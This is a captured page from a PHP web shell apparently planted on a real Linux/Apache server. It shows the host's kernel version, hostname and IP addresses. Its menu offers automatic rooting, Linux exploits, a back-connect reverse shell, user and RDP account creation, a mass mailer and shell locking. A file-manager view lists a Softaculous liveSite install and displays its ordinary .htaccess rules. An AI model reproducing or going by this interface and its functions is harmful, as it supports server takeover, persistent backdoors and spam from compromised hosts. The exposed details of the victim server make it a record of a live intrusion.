Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
livesite /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
?;
php81
[ DIR ]
drwxr-xr-x
?;
php82
[ DIR ]
drwxr-xr-x
.htaccess
816
B
-rw-r--r--
config.php
300
B
-rw-r--r--
edit.php
4.17
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
28
B
-rw-r--r--
import.php
3.02
KB
-rw-r--r--
info.xml
3.91
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
4.81
KB
-rw-r--r--
install.xml
565
B
-rw-r--r--
md5
14.57
KB
-rw-r--r--
notes.txt
232
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# The following rules are used by liveSite. RewriteEngine on # When the system is accessed from a sub-directory with an Apache alias # (e.g. http://192.168.0.1/~example/), then you might need to uncomment the line # below and update it to point to where the system is installed. The system # will attempt to automatically set the correct value for the line below during # installation. You might need to comment out the line below once you launch # your site at a permanent URL without a sub-directory (e.g. http://www.example.com). RewriteBase [[relativeurl]]/ # The following lines redirect all requests to the liveSite router, # except for when an actual file or directory exists for the request. RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . livesite/router.php [L]
Close